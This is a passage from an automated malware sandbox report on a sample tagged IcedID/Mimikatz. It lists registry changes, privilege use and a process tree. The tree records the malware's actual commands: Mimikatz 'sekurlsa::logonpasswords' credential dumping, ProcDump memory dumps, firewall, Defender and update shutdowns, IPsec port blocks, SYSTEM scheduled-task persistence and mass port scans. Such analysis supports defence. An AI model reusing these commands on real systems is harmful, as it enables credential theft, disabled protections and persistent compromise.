Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	clzutbi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	clzutbi.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4392	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4064	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	4064	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	3840	clzutbi.exe
Token: SeDebugPrivilege	2564	clzutbi.exe
Token: SeDebugPrivilege	1668	vfshost.exe
Token: SeDebugPrivilege	2072	tmrkyzihy.exe
Token: SeLockMemoryPrivilege	3368	uuktqy.exe
Token: SeLockMemoryPrivilege	3368	uuktqy.exe
Token: SeDebugPrivilege	2024	tmrkyzihy.exe
Token: SeDebugPrivilege	1664	tmrkyzihy.exe
Token: SeDebugPrivilege	2388	tmrkyzihy.exe
Token: SeDebugPrivilege	5328	tmrkyzihy.exe
Token: SeDebugPrivilege	4756	tmrkyzihy.exe
Token: SeDebugPrivilege	5968	tmrkyzihy.exe
Token: SeDebugPrivilege	5740	tmrkyzihy.exe
Token: SeDebugPrivilege	6100	tmrkyzihy.exe
Token: SeDebugPrivilege	5248	tmrkyzihy.exe
Token: SeDebugPrivilege	4732	tmrkyzihy.exe
Token: SeDebugPrivilege	2032	tmrkyzihy.exe
Token: SeDebugPrivilege	6052	tmrkyzihy.exe
Token: SeDebugPrivilege	5996	tmrkyzihy.exe
Token: SeDebugPrivilege	3000	tmrkyzihy.exe
Token: SeDebugPrivilege	1936	tmrkyzihy.exe
Token: SeDebugPrivilege	5940	tmrkyzihy.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
4064	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe
4064	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe
3840	clzutbi.exe
3840	clzutbi.exe
2564	clzutbi.exe
2564	clzutbi.exe
2592	xohudmc.exe
2176	joxnkm.exe
3444	clzutbi.exe
3444	clzutbi.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4064 wrote to memory of 4916	4064	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe	83
PID 4064 wrote to memory of 4916	4064	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe	83
PID 4064 wrote to memory of 4916	4064	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe	83
PID 4916 wrote to memory of 4392	4916	cmd.exe	86
PID 4916 wrote to memory of 4392	4916	cmd.exe	86
PID 4916 wrote to memory of 4392	4916	cmd.exe	86
PID 4916 wrote to memory of 3840	4916	cmd.exe	89
PID 4916 wrote to memory of 3840	4916	cmd.exe	89
PID 4916 wrote to memory of 3840	4916	cmd.exe	89
PID 2564 wrote to memory of 2916	2564	clzutbi.exe	91
PID 2564 wrote to memory of 2916	2564	clzutbi.exe	91
PID 2564 wrote to memory of 2916	2564	clzutbi.exe	91
PID 2916 wrote to memory of 3008	2916	cmd.exe	93
PID 2916 wrote to memory of 3008	2916	cmd.exe	93
PID 2916 wrote to memory of 3008	2916	cmd.exe	93
PID 2916 wrote to memory of 4804	2916	cmd.exe	94
PID 2916 wrote to memory of 4804	2916	cmd.exe	94
PID 2916 wrote to memory of 4804	2916	cmd.exe	94
PID 2916 wrote to memory of 1796	2916	cmd.exe	95
PID 2916 wrote to memory of 1796	2916	cmd.exe	95
PID 2916 wrote to memory of 1796	2916	cmd.exe	95
PID 2916 wrote to memory of 2360	2916	cmd.exe	96
PID 2916 wrote to memory of 2360	2916	cmd.exe	96
PID 2916 wrote to memory of 2360	2916	cmd.exe	96
PID 2916 wrote to memory of 4760	2916	cmd.exe	97
PID 2916 wrote to memory of 4760	2916	cmd.exe	97
PID 2916 wrote to memory of 4760	2916	cmd.exe	97
PID 2916 wrote to memory of 4040	2916	cmd.exe	98
PID 2916 wrote to memory of 4040	2916	cmd.exe	98
PID 2916 wrote to memory of 4040	2916	cmd.exe	98
PID 2564 wrote to memory of 2968	2564	clzutbi.exe	101
PID 2564 wrote to memory of 2968	2564	clzutbi.exe	101
PID 2564 wrote to memory of 2968	2564	clzutbi.exe	101
PID 2564 wrote to memory of 2532	2564	clzutbi.exe	103
PID 2564 wrote to memory of 2532	2564	clzutbi.exe	103
PID 2564 wrote to memory of 2532	2564	clzutbi.exe	103
PID 2564 wrote to memory of 5012	2564	clzutbi.exe	105
PID 2564 wrote to memory of 5012	2564	clzutbi.exe	105
PID 2564 wrote to memory of 5012	2564	clzutbi.exe	105
PID 2564 wrote to memory of 1908	2564	clzutbi.exe	112
PID 2564 wrote to memory of 1908	2564	clzutbi.exe	112
PID 2564 wrote to memory of 1908	2564	clzutbi.exe	112
PID 1908 wrote to memory of 1196	1908	cmd.exe	114
PID 1908 wrote to memory of 1196	1908	cmd.exe	114
PID 1908 wrote to memory of 1196	1908	cmd.exe	114
PID 1196 wrote to memory of 1608	1196	wpcap.exe	115
PID 1196 wrote to memory of 1608	1196	wpcap.exe	115
PID 1196 wrote to memory of 1608	1196	wpcap.exe	115
PID 1608 wrote to memory of 4284	1608	net.exe	117
PID 1608 wrote to memory of 4284	1608	net.exe	117
PID 1608 wrote to memory of 4284	1608	net.exe	117
PID 1196 wrote to memory of 2388	1196	wpcap.exe	118
PID 1196 wrote to memory of 2388	1196	wpcap.exe	118
PID 1196 wrote to memory of 2388	1196	wpcap.exe	118
PID 2388 wrote to memory of 3836	2388	net.exe	120
PID 2388 wrote to memory of 3836	2388	net.exe	120
PID 2388 wrote to memory of 3836	2388	net.exe	120
PID 1196 wrote to memory of 4732	1196	wpcap.exe	121
PID 1196 wrote to memory of 4732	1196	wpcap.exe	121
PID 1196 wrote to memory of 4732	1196	wpcap.exe	121
PID 4732 wrote to memory of 3348	4732	net.exe	123
PID 4732 wrote to memory of 3348	4732	net.exe	123
PID 4732 wrote to memory of 3348	4732	net.exe	123
PID 1196 wrote to memory of 1804	1196	wpcap.exe	124

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2080
- C:\Windows\TEMP\niurqlbtc\uuktqy.exe
  "C:\Windows\TEMP\niurqlbtc\uuktqy.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3368

C:\Users\Admin\AppData\Local\Temp\2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\pkcmekii\clzutbi.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:4392
- - C:\Windows\pkcmekii\clzutbi.exe
    C:\Windows\pkcmekii\clzutbi.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3840

C:\Windows\pkcmekii\clzutbi.exe
C:\Windows\pkcmekii\clzutbi.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:4040
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:2968
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:2532
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:5012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ukbuctgtv\pytibitck\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\ukbuctgtv\pytibitck\wpcap.exe
    C:\Windows\ukbuctgtv\pytibitck\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1608
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:4284
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2388
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:3836
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:3348
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:1804
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:4892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4804
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:2216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:3500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ukbuctgtv\pytibitck\krejtiiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ukbuctgtv\pytibitck\Scant.txt
  2⤵
  PID:348
- - C:\Windows\ukbuctgtv\pytibitck\krejtiiti.exe
    C:\Windows\ukbuctgtv\pytibitck\krejtiiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ukbuctgtv\pytibitck\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ukbuctgtv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ukbuctgtv\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:3456
- - C:\Windows\ukbuctgtv\Corporate\vfshost.exe
    C:\Windows\ukbuctgtv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rkcmiuktc" /ru system /tr "cmd /c C:\Windows\ime\clzutbi.exe"
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4588
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "rkcmiuktc" /ru system /tr "cmd /c C:\Windows\ime\clzutbi.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ekkipuiyy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pkcmekii\clzutbi.exe /p everyone:F"
  2⤵
  PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "ekkipuiyy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pkcmekii\clzutbi.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:3088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ljygzbuvi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\niurqlbtc\uuktqy.exe /p everyone:F"
  2⤵
  PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "ljygzbuvi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\niurqlbtc\uuktqy.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:4400
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:4448
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:1408
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:2888
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:1232
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:3368
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:1708
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:3644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:3784
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:3812
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:1092
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4968
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:3884
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:3312
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:4228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:4896
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:3024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:3336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:4740
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:3000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:4504
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:4328
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:5052
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:780
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:3332
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:3032
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:2952
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:2592
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 796 C:\Windows\TEMP\ukbuctgtv\796.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2072
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 316 C:\Windows\TEMP\ukbuctgtv\316.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 2080 C:\Windows\TEMP\ukbuctgtv\2080.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\ukbuctgtv\pytibitck\scan.bat
  2⤵
  PID:3388
- - C:\Windows\ukbuctgtv\pytibitck\ubntibupm.exe
    ubntibupm.exe TCP 25.150.0.1 25.150.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    PID:4968
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 2644 C:\Windows\TEMP\ukbuctgtv\2644.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2388
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 2764 C:\Windows\TEMP\ukbuctgtv\2764.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5328
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 2820 C:\Windows\TEMP\ukbuctgtv\2820.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4756
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 668 C:\Windows\TEMP\ukbuctgtv\668.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5968
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 3724 C:\Windows\TEMP\ukbuctgtv\3724.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5740
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 3816 C:\Windows\TEMP\ukbuctgtv\3816.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6100
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 3876 C:\Windows\TEMP\ukbuctgtv\3876.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5248
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 3968 C:\Windows\TEMP\ukbuctgtv\3968.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4732
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
  C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe -accepteula -mp 5040 C:\Windows\TEMP\ukbuctgtv\5040.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\TEMP\ukbuctgtv\tmrkyzihy.exe
